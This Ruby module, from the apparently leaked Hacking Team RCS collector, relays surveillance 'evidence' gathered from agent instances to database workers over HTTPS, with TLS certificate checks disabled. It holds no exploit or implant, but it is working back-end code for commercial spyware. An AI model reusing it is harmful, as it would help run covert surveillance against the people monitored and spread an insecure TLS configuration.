hackedteam/rcs-collector

View on GitHub
lib/rcs-carrier/evidence_transfer.rb

Summary

Maintainability
B
4 hrs
Test Coverage
#
#  Evidence Transfer module for transferring evidence to the db
#


# from RCS::Common
require 'rcs-common/trace'
require 'rcs-common/fixnum'
require 'rcs-common/symbolize'
require 'rcs-common/path_utils'
require 'rcs-common/systemstatus'

require_release 'rcs-collector/db'
require_release 'rcs-collector/evidence_manager'


# from system
require 'thread'

module RCS
module Carrier

class EvidenceTransfer
  include Singleton
  include RCS::Tracer
  include SystemStatusMixin

  def initialize
    @workers = {}
    @http = {}
    @threads = Hash.new
  end

  def self.run
    instance.run
  end

  def run
    # infinite loop for working
    loop do
      # pass the control to other threads
      sleep 1

      # don't try to transfer if the db is down
      next unless DB.instance.connected?

      # for each instance get the ids we have and send them
      EvidenceManager.instance.instances.each do |instance|

        # get the info and evidence from the instance
        evidence, info = get_evidence(instance)

        next if evidence.empty? or info.nil?

        # one thread per instance, but check if an instance is already processing
        @threads[instance] ||= Thread.new do
          begin

            trace :info, "Transferring evidence for: #{instance}"

            # make sure that the symbols are present
            # we are doing this hack since we are passing information taken from the store
            # and passing them as they were a session
            sess = info.symbolize
            sess[:demo] = (sess[:demo] == 1) ? true : false

            # ask the database the id of the agent
            status, agent_id = DB.instance.agent_status(sess[:ident], sess[:instance], sess[:platform], sess[:demo], sess[:level])
            sess[:bid] = agent_id

            case status
              when DB::DELETED_AGENT, DB::NO_SUCH_AGENT, DB::CLOSED_AGENT
                trace :info, "[#{instance}] has status (#{status}) deleting repository"
                EvidenceManager.instance.purge(instance, {force: true})
              when DB::QUEUED_AGENT, DB::UNKNOWN_AGENT
                trace :warn, "[#{instance}] was queued, not transferring evidence"
              when DB::ACTIVE_AGENT
                raise "agent _id cannot be ZERO" if agent_id == 0
                # update the status in the db if it was offline when syncing
                DB.instance.sync_update sess, info['version'], info['user'], info['device'], info['source'], info['sync_time']

                # transfer all the evidence
                while (id = evidence.shift)
                  self.transfer instance, id, evidence.count
                end
            end

          rescue SocketError, PersistentHTTP::Error => e
            change_status(:error, "Cannot reach worker")
            trace(:error, "Cannot reach worker: [#{e.class}] #{e.message}")
          rescue Exception => e
            change_status(:error, "Error processing evidence: [#{e.class}] #{e.message}")
            trace(:error, "Error processing evidence")
          ensure
            trace :debug, "Job for #{instance} is over (#{@threads.keys.size}/#{Thread.list.count} working threads)"

            # job done, exit
            @threads.delete(instance)
            Thread.kill Thread.current
          end
        end
      end
    end
  rescue Exception => e
    trace :error, "Evidence transfer error: #{e.message}"
    retry
  end

  def threads
    @threads.size
  end

  def get_evidence(instance)
    info = EvidenceManager.instance.instance_info instance
    EvidenceManager.instance.purge(instance, {force: true}) if info.nil?

    # get all the ids of the evidence for this instance
    evidence = EvidenceManager.instance.evidence_ids(instance)

    return evidence, info
  end

  def transfer(instance, id, left)
    evidence = EvidenceManager.instance.get_evidence(id, instance)
    raise "evidence to be transferred is nil" if evidence.nil?

    address = get_worker_address(instance)
    raise "invalid worker address" unless address
    ret, error, action = send_evidence(address, instance, evidence)

    if ret
      trace :info, "Evidence sent to db [#{instance}] #{evidence.size.to_s_bytes} - #{left} left to send"

      StatsManager.instance.add ev_output: 1, ev_output_size: evidence.size

      EvidenceManager.instance.del_evidence(id, instance) if action == :delete
    else
      trace :error, "Evidence NOT sent to db [#{instance}]: #{error}"
      EvidenceManager.instance.del_evidence(id, instance) if action == :delete
    end
  end

  def get_worker_address(instance)
    return @workers[instance] if @workers[instance]

    address = DB.instance.get_worker(instance)
    trace :info, "Worker address for #{instance} is #{address}"

    @workers[instance] = address
  end

  def send_evidence(address, instance, evidence)

    host, port = address.split(':')

    http = @http[address] ||= PersistentHTTP.new(
      :name         => 'PersistentToWorker' + address,
      :pool_size    => 20,
      :host         => host,
      :port         => port,
      :use_ssl      => true,
      :read_timeout => 300,
      :verify_mode  => OpenSSL::SSL::VERIFY_NONE
    )

    request = Net::HTTP::Post.new("/evidence/#{instance}")
    request.body = evidence
    ret = http.request(request)

    case ret
      when Net::HTTPSuccess then return true, "OK", :delete
      when Net::HTTPConflict then return false, "empty evidence", :delete
    end

    return false, ret.body
  rescue Exception => e
    trace :error, "Cannot send evidence to #{address}: #{e.class} #{e.message}"
    #trace :fatal, e.backtrace
    raise
  end

end
  
end #Collector::
end #RCS::